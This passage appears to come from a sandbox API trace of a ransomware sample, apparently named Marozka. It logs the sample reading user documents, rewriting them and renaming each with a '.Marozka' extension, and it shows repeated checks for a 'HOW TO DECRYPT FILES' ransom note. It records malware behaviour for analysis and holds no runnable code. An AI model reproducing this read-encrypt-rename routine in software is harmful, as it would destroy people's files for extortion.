ftLastAccessTime.dwLowDateTime=0x931df420, ftLastAccessTime.dwHighDateTime=0x1d4d2be, ftLastWriteTime.dwLowDateTime=0xe23b079d, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xe180)) returned 1 [0052.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0052.841] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Hn43J1ByP6VEk.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\hn43j1byp6vek.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Hn43J1ByP6VEk.rtf.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\hn43j1byp6vek.rtf.marozka")) returned 1 [0052.842] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Ut 0a38CkT7gWs5.rtf", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Ut 0a38CkT7gWs5.rtf", lpFilePart=0x0) returned 0x45 [0052.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0052.842] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Ut 0a38CkT7gWs5.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\ut 0a38ckt7gws5.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.842] GetFileType (hFile=0x2e0) returned 0x1 [0052.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0052.842] GetFileType (hFile=0x2e0) returned 0x1 [0052.842] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0x13b8a [0052.842] ReadFile (in: hFile=0x2e0, lpBuffer=0x2649bb4, nNumberOfBytesToRead=0x13b8a, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x2649bb4*, lpNumberOfBytesRead=0x5be9d4*=0x13b8a, lpOverlapped=0x0) returned 1 [0052.843] CloseHandle (hObject=0x2e0) returned 1 [0052.983] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0052.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0052.983] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0052.983] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Ut 0a38CkT7gWs5.rtf", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Ut 0a38CkT7gWs5.rtf", lpFilePart=0x0) returned 0x45 [0052.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0052.983] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Ut 0a38CkT7gWs5.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\ut 0a38ckt7gws5.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.985] GetFileType (hFile=0x2e0) returned 0x1 [0052.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0052.985] GetFileType (hFile=0x2e0) returned 0x1 [0052.985] WriteFile (in: hFile=0x2e0, lpBuffer=0x26d1dc0*, nNumberOfBytesToWrite=0x13b90, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x26d1dc0*, lpNumberOfBytesWritten=0x5be9c8*=0x13b90, lpOverlapped=0x0) returned 1 [0052.988] CloseHandle (hObject=0x2e0) returned 1 [0052.990] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Ut 0a38CkT7gWs5.rtf", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Ut 0a38CkT7gWs5.rtf", lpFilePart=0x0) returned 0x45 [0052.990] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Ut 0a38CkT7gWs5.rtf.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Ut 0a38CkT7gWs5.rtf.Marozka", lpFilePart=0x0) returned 0x4d [0052.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0052.990] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Ut 0a38CkT7gWs5.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\ut 0a38ckt7gws5.rtf"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb666f50, ftCreationTime.dwHighDateTime=0x1d4d3de, ftLastAccessTime.dwLowDateTime=0x812011e0, ftLastAccessTime.dwHighDateTime=0x1d4d403, ftLastWriteTime.dwLowDateTime=0xe250627f, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x13b90)) returned 1 [0052.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0052.991] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Ut 0a38CkT7gWs5.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\ut 0a38ckt7gws5.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Ut 0a38CkT7gWs5.rtf.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\ut 0a38ckt7gws5.rtf.marozka")) returned 1 [0052.991] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\v60EAU3VaPdH.odt", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\v60EAU3VaPdH.odt", lpFilePart=0x0) returned 0x42 [0052.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0052.991] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\v60EAU3VaPdH.odt" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\v60eau3vapdh.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.992] GetFileType (hFile=0x2e0) returned 0x1 [0052.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0052.992] GetFileType (hFile=0x2e0) returned 0x1 [0052.992] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0xc4eb [0052.992] ReadFile (in: hFile=0x2e0, lpBuffer=0x26e5f1c, nNumberOfBytesToRead=0xc4eb, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x26e5f1c*, lpNumberOfBytesRead=0x5be9d4*=0xc4eb, lpOverlapped=0x0) returned 1 [0052.992] CloseHandle (hObject=0x2e0) returned 1 [0053.060] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0053.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0053.060] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0053.061] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\v60EAU3VaPdH.odt", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\v60EAU3VaPdH.odt", lpFilePart=0x0) returned 0x42 [0053.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0053.061] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\v60EAU3VaPdH.odt" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\v60eau3vapdh.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0053.062] GetFileType (hFile=0x2e0) returned 0x1 [0053.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0053.062] GetFileType (hFile=0x2e0) returned 0x1 [0053.062] WriteFile (in: hFile=0x2e0, lpBuffer=0x2757bec*, nNumberOfBytesToWrite=0xc4f0, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x2757bec*, lpNumberOfBytesWritten=0x5be9c8*=0xc4f0, lpOverlapped=0x0) returned 1 [0053.064] CloseHandle (hObject=0x2e0) returned 1 [0053.068] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\v60EAU3VaPdH.odt", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\v60EAU3VaPdH.odt", lpFilePart=0x0) returned 0x42 [0053.068] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\v60EAU3VaPdH.odt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\v60EAU3VaPdH.odt.Marozka", lpFilePart=0x0) returned 0x4a [0053.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0053.068] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\v60EAU3VaPdH.odt" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\v60eau3vapdh.odt"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0157170, ftCreationTime.dwHighDateTime=0x1d4c97c, ftLastAccessTime.dwLowDateTime=0x432efdc0, ftLastAccessTime.dwHighDateTime=0x1d4c60b, ftLastWriteTime.dwLowDateTime=0xe25c4d2c, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xc4f0)) returned 1 [0053.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0053.068] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\v60EAU3VaPdH.odt" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\v60eau3vapdh.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\v60EAU3VaPdH.odt.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\v60eau3vapdh.odt.marozka")) returned 1 [0053.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0053.069] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_", lpFilePart=0x0) returned 0x2b [0053.069] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d688 [0053.069] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.070] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.070] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.070] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.070] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.070] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.070] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.070] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.071] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.071] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.071] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0053.071] FindClose (in: hFindFile=0xa7d688 | out: hFindFile=0xa7d688) returned 1 [0053.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0053.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0053.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0053.071] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_", lpFilePart=0x0) returned 0x2b [0053.071] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7db88 [0053.072] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.072] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.072] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.072] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.072] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.073] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.073] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.073] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.073] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.073] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0053.073] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0053.074] FindClose (in: hFindFile=0xa7db88 | out: hFindFile=0xa7db88) returned 1 [0053.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0053.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0053.074] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\JHAs_xCJkm8.pdf", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\JHAs_xCJkm8.pdf", lpFilePart=0x0) returned 0x3b [0053.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0053.074] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\JHAs_xCJkm8.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\jhas_xcjkm8.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0053.074] GetFileType (hFile=0x2e0) returned 0x1 [0053.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0053.074] GetFileType (hFile=0x2e0) returned 0x1 [0053.074] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0x6f9c [0053.075] ReadFile (in: hFile=0x2e0, lpBuffer=0x27671b0, nNumberOfBytesToRead=0x6f9c, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x27671b0*, lpNumberOfBytesRead=0x5be9d4*=0x6f9c, lpOverlapped=0x0) returned 1 [0053.075] CloseHandle (hObject=0x2e0) returned 1 [0053.144] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0053.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0053.145] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0053.145] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\JHAs_xCJkm8.pdf", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\JHAs_xCJkm8.pdf", lpFilePart=0x0) returned 0x3b [0053.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0053.145] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\JHAs_xCJkm8.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\jhas_xcjkm8.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0053.152] GetFileType (hFile=0x2e0) returned 0x1 [0053.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0053.152] GetFileType (hFile=0x2e0) returned 0x1 [0053.152] WriteFile (in: hFile=0x2e0, lpBuffer=0x27d6db8*, nNumberOfBytesToWrite=0x6fa0, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x27d6db8*, lpNumberOfBytesWritten=0x5be9c8*=0x6fa0, lpOverlapped=0x0) returned 1 [0053.157] CloseHandle (hObject=0x2e0) returned 1 [0053.162] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\JHAs_xCJkm8.pdf", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\JHAs_xCJkm8.pdf", lpFilePart=0x0) returned 0x3b [0053.162] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\JHAs_xCJkm8.pdf.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\JHAs_xCJkm8.pdf.Marozka", lpFilePart=0x0) returned 0x43 [0053.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0053.162] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\JHAs_xCJkm8.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\jhas_xcjkm8.pdf"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3404410, ftCreationTime.dwHighDateTime=0x1d4d4f2, ftLastAccessTime.dwLowDateTime=0x5e2a2300, ftLastAccessTime.dwHighDateTime=0x1d4cab8, ftLastWriteTime.dwLowDateTime=0xe26ab75f, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x6fa0)) returned 1 [0053.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0053.162] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\JHAs_xCJkm8.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\jhas_xcjkm8.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\JHAs_xCJkm8.pdf.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\jhas_xcjkm8.pdf.marozka")) returned 1 [0053.163] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\jsWW.xls", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\jsWW.xls", lpFilePart=0x0) returned 0x34 [0053.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0053.163] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\jsWW.xls" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\fgt_\\jsww.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0053.163] GetFileType (hFile=0x2e0) returned 0x1 [0053.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0053.163] GetFileType (hFile=0x2e0) returned 0x1 [0053.163] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0xc01b [0053.164] ReadFile (in: hFile=0x2e0, lpBuffer=0x27de2a0, nNumberOfBytesToRead=0xc01b, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x27de2a0*, lpNumberOfBytesRead=0x5be9d4*=0xc01b, lpOverlapped=0x0) returned 1 [0053.164] CloseHandle (hObject=0x2e0) returned 1 [0053.317] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0053.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0053.317] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0053.317] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\jsWW.xls", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\FGt_\\jsWW.xls", lpFilePart=0x0) returned 0x34 [0053.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0053.317] 